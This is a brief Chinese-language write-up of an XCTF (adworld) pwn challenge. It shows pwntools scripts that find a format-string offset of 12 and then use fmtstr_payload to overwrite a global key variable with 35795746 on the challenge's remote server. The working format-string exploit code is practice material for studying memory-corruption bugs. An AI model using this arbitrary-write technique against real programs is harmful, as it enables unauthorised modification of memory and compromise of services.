[攻防世界 pwn]——实时数据监测
- 题目地址:https://adworld.xctf.org.cn/
- 题目:
checksec就不说了,没什么
ida中
只要将key里面的值修改为35795746,就好
写个小脚本在pwndbg中看看偏移
from pwn import *
p = process('./pwn')
gdb.attach(p, 'b *0x080484A7')
#p = remote("111.200.241.244",48715)
key_addr = 0x0804A048
payload = 'aaaa%4$s'
p.sendline(payload)
p.interactive()
发现偏移位12,距离输入
所以,exploit如下,fmtstr_payload是pwntools集成的模板,对于第一个参数是offest(偏移),后面是地址,和地址中写入的值。
exploit
from pwn import *
#p = process('./pwn')
#gdb.attach(p, 'b *0x080484A7')
p = remote("111.200.241.244",48715)
key_addr = 0x0804A048
payload = fmtstr_payload(12,{key_addr:35795746})
p.sendline(payload)
p.interactive()